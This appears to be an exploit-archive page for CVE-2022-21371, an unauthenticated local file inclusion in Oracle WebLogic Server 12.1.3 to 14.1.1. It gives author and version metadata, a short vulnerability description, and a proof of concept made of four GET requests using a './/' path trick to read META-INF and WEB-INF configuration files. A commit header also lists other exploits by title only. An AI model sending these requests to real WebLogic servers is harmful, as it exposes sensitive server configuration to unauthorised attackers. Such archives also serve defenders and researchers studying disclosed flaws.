d3b7d652cc
5 changes to exploits/shellcodes PolicyKit-1 0.105-31 - Privilege Escalation Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated) WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated) WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
26 lines
No EOL
1,015 B
Text
26 lines
No EOL
1,015 B
Text
# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
|
|
# Date: 25/1/2022
|
|
# Exploit Author: Jonah Tan (@picar0jsu)
|
|
# Vendor Homepage: https://www.oracle.com
|
|
# Software Link:
|
|
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
|
|
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
|
|
# Tested on: Windows Server 2019
|
|
# CVE : CVE-2022-21371
|
|
|
|
# Description
|
|
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
|
|
Middleware (component: Web Container).
|
|
Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
|
|
and 14.1.1.0.0.
|
|
Easily exploitable vulnerability allows unauthenticated attacker with
|
|
network access via HTTP to compromise Oracle WebLogic Server.
|
|
Successful attacks of this vulnerability can result in unauthorized access
|
|
to critical data or complete access to all Oracle WebLogic Server
|
|
accessible data.
|
|
|
|
# PoC
|
|
GET .//META-INF/MANIFEST.MF
|
|
GET .//WEB-INF/web.xml
|
|
GET .//WEB-INF/portlet.xml
|
|
GET .//WEB-INF/weblogic.xml |